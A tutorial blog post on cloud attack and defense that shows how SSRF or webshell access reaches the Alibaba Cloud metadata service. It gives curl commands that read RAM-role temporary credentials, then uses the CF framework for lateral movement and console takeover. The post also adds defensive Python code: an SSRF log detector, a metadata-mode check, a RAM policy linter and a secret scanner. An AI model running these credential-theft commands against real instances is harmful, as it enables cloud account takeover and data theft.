嚴華 posted on 2024-12-31 15:02:16

Cloud Attack and Defense - Cloud Services & Elastic Compute Servers & Cloud Databases & Instance Metadata & Access Control Roles & AK Console Takeover

Key points:
1. Cloud services - elastic compute servers - metadata & SSRF & AK
2. Cloud services - cloud databases - external connections & privilege escalation
Chapter outline:
Cloud scenario attack and defense: public cloud, private cloud, hybrid cloud, virtualization clusters, cloud desktops, etc.
Cloud vendor attack and defense: Alibaba Cloud, Tencent Cloud, Huawei Cloud, AWS, Google Cloud, Microsoft Azure, etc.
Cloud service attack and defense: object storage, cloud databases, elastic compute servers (cloud servers), VPC & RAM, etc.
Cloud-native attack and defense: Docker, Kubernetes (k8s), container escape, CI/CD, etc.
I. Demo case - cloud services - elastic compute servers - metadata & SSRF & AK

Metadata overview
Instance metadata contains information about an Elastic Compute Service (ECS) instance within Alibaba Cloud. You can conveniently view instance metadata from inside a running instance and configure or manage the instance based on it. (Basic information: instance ID, IP address, NIC MAC address, operating system type, and so on. Instance identity consists of an instance identity document and an instance identity signature; all of this is generated in real time and is commonly used to quickly verify an instance's identity.)
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230164956226-1645510562.png
Metadata endpoints of the major cloud providers:
Alibaba Cloud metadata endpoint: http://100.100.100.200/
Tencent Cloud metadata endpoint: http://metadata.tencentyun.com/
Huawei Cloud metadata endpoint: http://169.254.169.254/
AWS metadata endpoint: http://169.254.169.254/
Microsoft Azure metadata endpoint: http://169.254.169.254/
Google Cloud metadata endpoint: http://metadata.google.internal/
Details of how metadata access is triggered can be found in each provider's official documentation:
Alibaba Cloud example: https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165119883-881575907.png
Tencent Cloud example: https://cloud.tencent.com/document/product/213/4934
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165201267-1057294471.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165211961-148777836.png
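As an added example (not part of the original post), the following Python script shows how a defender can spot SSRF attempts aimed at these metadata endpoints in ordinary web access logs: it URL-decodes each request target (twice, to catch double encoding) and flags any that reference the metadata hosts listed above or the /latest/meta-data paths used later on this page. The log lines, the /editor/fetch-image endpoint and the client addresses are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Metadata endpoints listed above, as the host strings an SSRF payload would carry.
METADATA_HOSTS = (
    "100.100.100.200",           # Alibaba Cloud
    "metadata.tencentyun.com",   # Tencent Cloud
    "169.254.169.254",           # Huawei Cloud, AWS, Azure
    "metadata.google.internal",  # Google Cloud
)

# Path fragments that only make sense when talking to a metadata service
# (the Alibaba Cloud paths are the ones used later on this page).
METADATA_PATH_MARKERS = ("/latest/meta-data", "security-credentials", "/latest/api/token")

# Common/combined access log format: client ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def normalise(text):
    # Decode twice so double-encoded payloads (%253A -> %3A -> :) are caught, then lowercase.
    return unquote(unquote(text)).lower()


def classify_request(target):
    """Return the reasons a request target looks like an SSRF attempt against a
    metadata service; an empty list means nothing suspicious was found."""
    decoded = normalise(target)
    reasons = [f"metadata host: {h}" for h in METADATA_HOSTS if h in decoded]
    reasons += [f"metadata path: {p}" for p in METADATA_PATH_MARKERS if p in decoded]
    return reasons


def scan_log(lines):
    """Scan access log lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a recognised log line: skip rather than crash
        reasons = classify_request(match.group("target"))
        if reasons:
            hits.append({
                "client": match.group("client"),
                "time": match.group("time"),
                "status": int(match.group("status")),
                "target": match.group("target"),
                "reasons": reasons,
            })
    return hits


# Constructed sample log lines (the /editor/fetch-image endpoint and all addresses are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2024:16:45:00 +0800] "GET /editor/fetch-image?source=http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Dec/2024:16:45:03 +0800] "GET /editor/fetch-image?source=https%3A%2F%2Fexample.com%2Flogo.jpg HTTP/1.1" 200 8841',
    '203.0.113.5 - - [30/Dec/2024:16:45:09 +0800] "GET /editor/fetch-image?source=http%253A%252F%252F169.254.169.254%252Flatest%252Fmeta-data%252F HTTP/1.1" 200 311',
    '203.0.113.9 - - [30/Dec/2024:16:46:12 +0800] "POST /editor/fetch-image?source=http://metadata.tencentyun.com/latest/meta-data/ HTTP/1.1" 403 0',
    'this line is not in access-log format',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["status"], "; ".join(hit["reasons"]))
```

The same classifier can be pointed at an egress proxy log instead, where the target is the URL the application itself fetched; that is the more reliable place to look, because the attacker's parameter may be hidden in a POST body rather than the query string.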
1. Prerequisites:

The elastic compute server has an access control role (RAM role) attached
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165305858-678496.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165309142-182369348.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165312176-17533738.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165313605-1574543512.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165316508-638465623.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165320810-878018135.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165323353-237637672.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165324876-922464126.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165325869-150815609.png
An SSRF vulnerability, or access already gained on a cloud server (a webshell or an RCE vulnerability through which the trigger URL can be requested)
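The two prerequisites together are what make the credential read possible, and the first thing to check on your own instances is whether the metadata service still answers plain GET requests. The following Python check is an added example, not from the original post or from any vendor tool. It assumes Alibaba Cloud's token-based security-hardening metadata mode as documented by Alibaba Cloud (a PUT to /latest/api/token carrying the X-aliyun-ecs-metadata-token-ttl-seconds header returns a token that must then be sent in X-aliyun-ecs-metadata-token), and it only probes the /latest/meta-data/ listing, never the credential path. The transport is injectable, so the classification runs offline with the simulated responses included in the block.

```python
import urllib.error
import urllib.request

# Alibaba Cloud metadata endpoint from this page, and the header names of its
# token-based (security-hardening) access mode as documented by Alibaba Cloud.
METADATA_BASE = "http://100.100.100.200"
TOKEN_URL = METADATA_BASE + "/latest/api/token"
PROBE_URL = METADATA_BASE + "/latest/meta-data/"
TTL_HEADER = "X-aliyun-ecs-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aliyun-ecs-metadata-token"


def http_fetch(method, url, headers=None, timeout=2):
    """Real transport: returns (status, body). Only meaningful when run on the instance."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""  # unreachable: not an ECS instance, or metadata access disabled


def assess_metadata_mode(fetch=http_fetch):
    """Classify how the instance's metadata service can be reached.

    Returns one of:
      "unreachable" - no metadata service answered
      "normal"      - a plain GET succeeds: any SSRF or RCE on the box can read it
      "hardened"    - plain GET is refused and a token obtained via PUT is required
      "unknown"     - plain GET refused, but the token handshake did not work either
    """
    status, _ = fetch("GET", PROBE_URL)
    if status is None:
        return "unreachable"
    if status == 200:
        return "normal"
    status, token = fetch("PUT", TOKEN_URL, {TTL_HEADER: "60"})
    if status != 200 or not token:
        return "unknown"
    status, _ = fetch("GET", PROBE_URL, {TOKEN_HEADER: token.strip()})
    return "hardened" if status == 200 else "unknown"


# Simulated transports for offline demonstration (constructed responses, not real metadata).
def simulate_normal_mode(method, url, headers=None, timeout=2):
    return 200, "instance-id\nram/\n"


def simulate_hardened_mode(method, url, headers=None, timeout=2):
    if method == "PUT" and url == TOKEN_URL and TTL_HEADER in (headers or {}):
        return 200, "simulated-token"
    if (headers or {}).get(TOKEN_HEADER) == "simulated-token":
        return 200, "instance-id\nram/\n"
    return 401, ""


def simulate_unreachable(method, url, headers=None, timeout=2):
    return None, ""


if __name__ == "__main__":
    print("this instance:", assess_metadata_mode())
```

A result of "normal" on an instance that also has a RAM role attached is exactly the combination this section describes; an SSRF that can only issue GET requests without custom headers cannot complete the PUT handshake, which is why the hardened mode closes the path.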
2. Exploitation scenario 1: lateral movement after gaining access to a server

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165358237-578777749.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165400172-417587212.png
Obtain the key role information

curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165441720-2080780793.png
Obtain the ECS role's temporary credentials

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165507925-1652643471.png
Use the AK for lateral movement

CF cloud penetration framework project: https://wiki.teamssix.com/CF/
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165532138-1895442417.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165540075-710809582.png
1. First configure the cloud provider's access key

cf config
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165631228-701336735.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165633305-1465665819.png
2. Obtain the console

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165652465-720711239.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165654632-571843877.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165656926-1518770260.png
3. Enumerate all ECS servers
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165707332-114086977.png

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165708795-311250326.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165710475-1655947089.png
4. Execute commands (the ECS servers must be enumerated first)

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165720925-24413941.png
5. Enumerate all OSS buckets

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165750072-960227774.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165758845-478718022.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165804642-690455568.png
Being able to see this much means the role was granted high privileges; with low privileges, far less would be visible.
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165819742-402343584.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165834662-1730895912.png
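The remark above about permissions is the crux: a stolen STS token can only do what the instance's RAM role allows. As an added example (not from the original post), here is a small Python linter for Alibaba Cloud RAM policy documents that flags the over-broad grants which turn a metadata leak into the full enumeration and command execution shown above. The action names follow the public ECS/OSS/RAM API names and are an assumption to verify against your own policy documents; the two sample policies are constructed.

```python
import fnmatch
import json

# Actions that let a stolen instance-role token do what this page demonstrates with CF.
# Names follow the public Alibaba Cloud ECS/OSS/RAM API names (assumption: verify them
# against your own policy documents and the RAM action reference).
HIGH_IMPACT_ACTIONS = {
    "ecs:DescribeInstances": "enumerate every ECS instance",
    "ecs:RunCommand": "execute commands on instances through Cloud Assistant",
    "oss:ListBuckets": "enumerate every OSS bucket",
    "oss:GetObject": "download bucket contents",
    "ram:CreateAccessKey": "mint new long-lived AKs",
    "ram:AttachPolicyToUser": "grant more permissions",
}


def _as_list(value):
    """RAM allows Action and Resource to be a single string or a list."""
    return value if isinstance(value, list) else [value]


def lint_policy(policy_json):
    """Return (severity, message) findings for an Alibaba Cloud RAM policy document."""
    policy = json.loads(policy_json)
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(stmt.get("Action", []))
        on_everything = "*" in _as_list(stmt.get("Resource", []))
        for action in actions:
            # RAM action strings use glob wildcards, e.g. ecs:Describe*
            covered = [k for k in HIGH_IMPACT_ACTIONS if fnmatch.fnmatchcase(k, action)]
            if action == "*":
                findings.append(("critical",
                                 f"statement {i}: Action '*' grants every API of every service"))
            elif action.endswith(":*"):
                names = ", ".join(covered) or "all of its APIs"
                findings.append(("high",
                                 f"statement {i}: '{action}' grants a whole service, including {names}"))
            elif covered and on_everything:
                impact = "; ".join(HIGH_IMPACT_ACTIONS[k] for k in covered)
                findings.append(("medium",
                                 f"statement {i}: '{action}' on Resource '*' lets a stolen token {impact}"))
            # A high-impact action scoped to named resources is the least-privilege shape: no finding.
    return findings


# Constructed sample policies (not taken from the post's screenshots).
BROAD_POLICY = json.dumps({
    "Version": "1",
    "Statement": [
        {"Effect": "Allow", "Action": ["ecs:Describe*", "ecs:RunCommand"], "Resource": "*"},
        {"Effect": "Allow", "Action": "oss:*", "Resource": "*"},
    ],
})

TIGHT_POLICY = json.dumps({
    "Version": "1",
    "Statement": [
        {"Effect": "Allow", "Action": ["oss:GetObject"], "Resource": ["acs:oss:*:*:app-assets/*"]},
        {"Effect": "Deny", "Action": "ram:*", "Resource": "*"},
    ],
})

if __name__ == "__main__":
    for name, doc in (("broad", BROAD_POLICY), ("tight", TIGHT_POLICY)):
        print(name, lint_policy(doc) or "no findings")
```

The broad policy is the shape that makes the screenshots above possible (every instance listed, commands run, every bucket listed); the tight one gives the same workload only the object reads it actually needs, so a leaked token from it is worth very little.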
3. Exploitation scenario 2: a web asset on a server has an SSRF vulnerability

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165847300-1011207895.png
Obtain the key role information
curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/
Obtain the ECS temporary credentials
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230165934653-170459158.png
Use the AK for lateral movement
CF cloud penetration framework project: https://wiki.teamssix.com/CF/
II. Demo case - cloud services - cloud databases - external connections & privilege escalation

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170014087-1989577321.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170015860-561624106.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170017076-2014367174.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170018811-1523269452.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170020215-1503395585.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170021575-948255976.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170023065-1310938109.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170024718-1155862960.png
1. Account and password
Found in the source code configuration (high probability) or obtained by brute force (low probability)
2. Connecting
Whitelisted & public-facing: connect directly, e.g. with Navicat
Internal network only: one of the internal servers has to forward the connection
3. AK usage (privilege escalation)
CF cloud penetration framework project: https://wiki.teamssix.com/CF/
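Since the first step above is credentials sitting in source configuration, the defender's counterpart is to find them before anyone else does. The Python scanner below is an added example, not part of the original post: it walks configuration text for Alibaba Cloud AccessKey IDs (the public LTAI prefix), AccessKey secrets, and database passwords or connection strings, skips obvious placeholders, and reports only a redacted preview. The sample properties file and every value in it are constructed; the generic password patterns are an assumption that will need tuning for a real code base.

```python
import re

# Patterns for the credential shapes this section says end up in source configuration.
# The LTAI prefix is the public shape of Alibaba Cloud AccessKey IDs; the remaining
# patterns are generic heuristics (assumption: tune them for your own code base).
PATTERNS = {
    "alibaba_access_key_id": re.compile(r"\bLTAI[A-Za-z0-9]{12,22}\b"),
    "access_key_secret": re.compile(
        r"(?i)(?:access[_-]?key[_-]?secret|aksecret)\s*[:=]\s*['\"]?([A-Za-z0-9+/]{20,})"),
    "db_password": re.compile(
        r"(?i)\b(?:db[_-]?pass(?:word)?|mysql[_-]?pass(?:word)?|password)\s*[:=]\s*['\"]?([^'\"\s,;]{6,})"),
    "db_connection_string": re.compile(
        r"(?i)\b(?:mysql|postgres(?:ql)?|mongodb|redis)://[^\s'\"]+"),
}

# Values that are placeholders rather than secrets; matches on these are skipped.
PLACEHOLDERS = {"changeme", "password", "your_password", "xxxxxx", "todo", "example"}


def redact(value):
    """Keep just enough to locate the secret in the file, never enough to use it."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "..."


def scan_text(text, source="<memory>"):
    """Return one finding per credential-looking value, with the value redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                value = match.group(1) if match.groups() else match.group(0)
                if value.lower() in PLACEHOLDERS:
                    continue
                findings.append({"source": source, "line": lineno,
                                 "kind": kind, "preview": redact(value)})
    return findings


def scan_file(path):
    """Scan one file on disk; intended for a pre-commit hook or a repository sweep."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read(), source=path)


# Constructed sample (every value below is fake).
SAMPLE_CONFIG = """\
# application.properties (constructed sample; all values are fake)
spring.datasource.url=jdbc:mysql://db.internal.example:3306/app
spring.datasource.username=app
spring.datasource.password=Sup3r-Secret-2024
oss.accessKeyId=LTAI5tFAKEFAKEFAKEfake
oss.accessKeySecret=0123456789abcdefABCDEF0123456789
cache.url=redis://:cachepass@cache.internal.example:6379/0
smtp.password=changeme
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CONFIG, "application.properties"):
        print(f"{f['source']}:{f['line']} {f['kind']} {f['preview']}")
```

Findings are redacted on purpose: the scanner's output usually ends up in CI logs or tickets, which would otherwise become one more place the credential is written down.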
III. Demo case - cloud attack and defense - using SSRF to break straight through a cloud internal network

1. Using SSRF to gain a foothold on Alibaba Cloud

The SSRF trigger point here is the image-upload function of the UEditor editor; below we make the server fetch an image from https://baidu.com?.jpg.
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170103070-1988197090.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241230170105085-538935536.png
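The ?.jpg trick works because the upload function checks the raw URL string rather than the parsed path, and nothing stops the fetched host from being the metadata service. As an added example (not from the original post or from UEditor), the following Python code puts that naive check beside a hardened validator that parses the URL, judges the extension on the path only, refuses the metadata hostnames listed earlier on this page, and resolves the host to make sure it is a public address. The resolver is injectable; the FAKE_DNS table and the addresses in it are constructed for offline use.

```python
import ipaddress
import posixpath
import socket
from urllib.parse import urlparse

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Metadata hostnames from this page, refused by name so no resolver trick can admit them.
BLOCKED_HOSTNAMES = {"metadata.tencentyun.com", "metadata.google.internal"}

# 100.64.0.0/10 (home of Alibaba Cloud's 100.100.100.200) is neither private nor global
# in the ipaddress module, so it is refused explicitly on top of the is_global check.
SHARED_ADDRESS_SPACE = ipaddress.ip_network("100.64.0.0/10")


def naive_extension_check(url):
    """The kind of check https://baidu.com?.jpg slips past: it looks at the raw string only."""
    return url.lower().endswith(tuple(ALLOWED_EXTENSIONS))


def validate_fetch_url(url, resolve=socket.gethostbyname):
    """Return (ok, reason) for a URL the server is asked to fetch on a user's behalf.

    `resolve` maps a hostname to an IPv4/IPv6 string; it is a parameter so the
    decision logic can be exercised offline with a fake table.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme must be http or https"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in the URL are not allowed"
    # The extension is judged on the parsed path, so '?.jpg' or '#.jpg' no longer count.
    if posixpath.splitext(parts.path)[1].lower() not in ALLOWED_EXTENSIONS:
        return False, "path does not end in an allowed image extension"
    if host.lower() in BLOCKED_HOSTNAMES:
        return False, f"{host} is a cloud metadata endpoint"
    try:
        ip = ipaddress.ip_address(host)  # literal address in the URL
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolve(host))
        except (socket.gaierror, ValueError):
            return False, f"{host} does not resolve"
    if not ip.is_global or ip in SHARED_ADDRESS_SPACE:
        return False, f"{host} resolves to non-public address {ip}"
    return True, f"ok, fetch from {ip}"


# Constructed name table for offline demonstration (no real DNS is consulted).
FAKE_DNS = {
    "baidu.com": "93.184.216.34",
    "cdn.example.com": "93.184.216.34",
    "rebind.example": "169.254.169.254",  # a name that points into link-local space
}


def fake_resolve(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver has no entry for {host}")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for candidate in ("https://baidu.com?.jpg",
                      "http://100.100.100.200/latest/meta-data/x.jpg",
                      "https://cdn.example.com/logo.jpg"):
        print(candidate, naive_extension_check(candidate), validate_fetch_url(candidate, fake_resolve))
```

The resolved address must also be the one the fetcher actually connects to, and HTTP redirects must be re-validated rather than followed blindly; otherwise a host that passes this check can still hand the fetcher a metadata URL.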
2. Use the SSRF vulnerability directly to reach the target's Alibaba Cloud metadata endpoint

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084020789-950901895.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084021731-742504820.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084023800-595663369.png
3. Go straight to the CF framework project and run it
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084035612-1244408013.png

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084036793-321314590.png
4. After downloading the bucket, another AK was found inside it, and this AK also has ECS permissions.

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084053810-919513317.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084054970-560774977.png
5. Use CF directly for one-click console takeover

https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084123927-841633862.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084126127-1914055794.png
https://img2024.cnblogs.com/blog/3407897/202412/3407897-20241231084128522-1567954546.png
